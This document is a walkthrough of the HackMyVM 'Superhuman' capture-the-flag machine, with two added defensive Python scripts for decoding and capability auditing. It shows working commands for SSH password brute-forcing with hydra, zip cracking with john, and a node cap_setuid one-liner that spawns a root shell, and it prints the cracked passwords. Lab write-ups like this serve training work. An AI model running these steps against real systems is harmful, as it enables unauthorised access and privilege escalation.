# Superhuman HackMyVM (Easy - Linux)

## Port scanning

```shell
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
```

```shell
nmap -sCV -p<PORTS> <IP>
```

Info:

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-11 03:10 EDT
Nmap scan report for 192.168.1.173
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
|   256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_  256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:52:5E:CB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds
```

We see there is a web page hosted on port `80`, but browsing to it shows nothing, so we do some `fuzzing` to see what we can find.

## Gobuster

```shell
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 100 -k -r
```

Info:

```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.173/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                ../Downloads/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 658]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
/notes-tips.txt       (Status: 200) [Size: 358]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 278]
Progress: 5095328 / 5095332 (100.00%)
===============================================================
Finished
===============================================================
```

Among the results there is an interesting file, so let's look at its contents like this:

```shell
curl http://192.168.1.173/notes-tips.txt
```

Info:

```
F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c
```

We see it is `Base85`-encoded; decoding it gives the following:

```
salome doesn't want me, I'm so sad... i'm sure god is dead...  
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.  
  
I must not forget to save it and put a good extension because I don't have much storage.
```
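Writeups call this encoding `Base85`, but Python knows two different Base85 alphabets, and only one of them decodes the note: the leading characters `F(&m'` of the page's blob are the Ascii85 encoding of the bytes `salo`. The following script is an added example, not part of the original writeup. It tries the common encodings, keeps the ones that yield plausible text, and prefers Ascii85 when several match. The sample blob is constructed inline; `decode_note` and `decode_candidates` are names chosen here.

```python
import base64
import binascii
import string

# Constructed sample: we Ascii85-encode our own plaintext rather than copy the
# page's note, so the script runs offline and the expected result is known.
SAMPLE_PLAINTEXT = b"salome_and_me.zip - constructed sample note"
SAMPLE_A85 = base64.a85encode(SAMPLE_PLAINTEXT).decode("ascii")

PRINTABLE = set(string.printable.encode())


def looks_like_text(data: bytes, threshold: float = 0.95) -> bool:
    """Heuristic: a decoding is plausible when nearly every byte is printable."""
    if not data:
        return False
    printable = sum(1 for b in data if b in PRINTABLE)
    return printable / len(data) >= threshold


def decode_candidates(blob: str) -> dict:
    """Try the text encodings a CTF note commonly uses and return every
    decoding that yields plausible text, keyed by encoding name."""
    decoders = {
        "base64": lambda s: base64.b64decode(s, validate=True),
        "ascii85": base64.a85decode,          # the alphabet '!'..'u' used by the note
        "base85_rfc1924": base64.b85decode,   # the other Base85 alphabet Python ships
    }
    results = {}
    for name, fn in decoders.items():
        try:
            out = fn(blob.encode("ascii"))
        except (binascii.Error, ValueError):
            continue  # wrong alphabet or bad length for this encoding
        if looks_like_text(out):
            results[name] = out
    return results


def decode_note(blob: str) -> tuple:
    """Return (encoding_name, plaintext) for the best candidate, preferring
    Ascii85 because its alphabet is the one the page's note uses."""
    found = decode_candidates(blob)
    for name in ("ascii85", "base85_rfc1924", "base64"):
        if name in found:
            return name, found[name]
    raise ValueError("no plausible decoding found")


if __name__ == "__main__":
    name, text = decode_note(SAMPLE_A85)
    print(f"{name}: {text.decode()}")
```

The printable-ratio check is what keeps a wrong alphabet from being reported as a hit: a blob that happens to pass `b85decode` with the RFC 1924 alphabet usually comes out as binary noise, and `looks_like_text` rejects it.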

We see that the word we are looking for is `salome_and_` plus something else; `salome_and_me` makes sense, plus an extension. Trying `.txt` does not work, nor does `.html`, and so on... but if we try `.zip` we see that it works.

```shell
wget http://<IP>/salome_and_me.zip
```

If we try to unzip it we see that it asks for a password, so we will have to crack it as follows:

## zip2john

```shell
zip2john salome_and_me.zip > hash.zip
```

```shell
john --wordlist=<WORDLIST> hash.zip
```

Info:

```
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle           (salome_and_me.zip/salome_and_me.txt)     
1g 0:00:00:00 DONE (2025-04-11 03:32) 33.33g/s 136533p/s 136533c/s 136533C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

We see that it worked and the password is `turtle`, so let's try it.

```shell
unzip salome_and_me.zip
```

We enter `turtle` as the password and it extracts a file called `salome_and_me.txt`, which contains:

```
----------------------------------------------------

             GREAT POEM FOR SALOME

----------------------------------------------------


My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!
```

Let's build a password wordlist from that `.txt` for the user `fred`, since the text says it was written by someone called `fred`.

## Escalate user fred

We create the wordlist like this:

```shell
cat salome_and_me.txt | tr -cs 'a-zA-Z' '\n' | tr 'A-Z' 'a-z' | sort | uniq > pass.txt
```

> pass.txt

```
a
and
another
asshole
baby
because
bitch
call
darling
don
for
fred
fuck
give
go
great
hate
he
him
i
is
lady
ll
lonely
love
m
me
my
name
now
offered
peephole
poem
prefers
reject
s
sad
salome
scared
schopenhauer
she
stupid
switch
t
tonight
ugly
with
you
```

### Hydra

```shell
hydra -l fred -P pass.txt ssh://<IP> -t 64 -I
```

Info:

```
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-11 03:38:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 49 tasks per 1 server, overall 49 tasks, 49 login tries (l:1/p:49), ~1 try per task
[DATA] attacking ssh://192.168.1.173:22/
[22][ssh] host: 192.168.1.173   login: fred   password: schopenhauer
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-11 03:38:06
```

We see that it worked, so let's connect via `SSH` as follows:

```shell
ssh fred@<IP>
```

We enter `schopenhauer` as the password and we are in, so we read the user `flag`.

> user.txt

```
Ineedmorepower
```

## Escalate Privileges

If we list the `capabilities` set on files reachable by this user, we see the following:

```shell
/usr/sbin/getcap -r / 2>/dev/null
```

Info:

```
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
```
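A `cap_setuid+ep` on a general-purpose interpreter such as `node` is the finding that matters here; `cap_net_raw` on `ping` is its normal, expected setting. The script below is an added example (not from the original writeup) that parses `getcap -r` output in both the older `PATH = CAPSET` and the newer `PATH CAPSET` format, applies the `+`/`=`/`-` flag operators, and flags capabilities that let any caller become root or bypass file permissions. The `DANGEROUS` list is this example's own triage choice, and the sample input is constructed to mirror the two lines above.

```python
import re
import shutil
import subprocess

# Constructed sample of getcap -r output; the two lines mirror the page's findings.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
"""

# Capabilities that, on an executable any user can run, allow escalation to root
# or unrestricted file access. This set is the example's own triage list
# (an assumption, not an official classification).
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
    "cap_setfcap", "cap_sys_module",
}

# One capset clause: comma-separated names, an operator, and e/i/p flags,
# e.g. "cap_setuid+ep" or "cap_net_raw,cap_net_admin=eip".
CLAUSE = re.compile(r"^([\w,]*)([=+-])([eip]*)$")


def parse_getcap(text: str) -> list:
    """Turn getcap -r output into (path, {capability: flags}) tuples.
    Handles 'PATH = CAPSET' (older libcap) and 'PATH CAPSET' (newer libcap)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, capset = line.split(" = ", 1)
        else:
            path, _, capset = line.partition(" ")
        caps = {}
        for clause in capset.split():
            m = CLAUSE.match(clause)
            if not m:
                continue  # unknown syntax: skip rather than guess
            names, op, flags = m.groups()
            for name in filter(None, names.split(",")):
                current = set(caps.get(name, ""))
                if op == "=":
                    current = set(flags)       # '=' replaces the flag set
                elif op == "+":
                    current |= set(flags)      # '+' adds flags
                else:
                    current -= set(flags)      # '-' removes flags
                caps[name] = "".join(sorted(current))
        entries.append((path, caps))
    return entries


def triage(entries: list) -> list:
    """Return (path, capability, flags) for every dangerous capability that is
    permitted or effective on a file; benign ones like cap_net_raw are not listed."""
    findings = []
    for path, caps in entries:
        for cap, flags in caps.items():
            if cap in DANGEROUS and ("p" in flags or "e" in flags):
                findings.append((path, cap, flags))
    return findings


def audit_host() -> list:
    """Run getcap -r / on this machine (if the binary exists) and triage it."""
    getcap = shutil.which("getcap") or "/usr/sbin/getcap"
    try:
        proc = subprocess.run([getcap, "-r", "/"], capture_output=True, text=True)
    except FileNotFoundError:
        return []  # libcap tools not installed
    return triage(parse_getcap(proc.stdout))


if __name__ == "__main__":
    for path, cap, flags in triage(parse_getcap(SAMPLE_GETCAP)):
        print(f"{path}: {cap}+{flags} -> review, or drop it with: setcap -r {path}")
```

On a real host, run `audit_host()` as part of a build or compliance check; the remediation for a finding like the `node` one is to remove the file capability with `setcap -r /usr/bin/node` and, if the program really needs it, grant it through a dedicated service account instead.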

Let's look in `GTFOBins` to see what we can do with either of these `2` binaries we found.

URL = [Node capabilities on GTFOBins](https://gtfobins.github.io/gtfobins/node/#capabilities)

Searching there, we see that we can escalate to `root` through the `capability` set on `node`, so we do the following:

```shell
/usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
```

Info:

```
# whoami
root
```

With this we are now `root`, so we read the `root` `flag`.

> root.txt

```
Imthesuperhuman
```
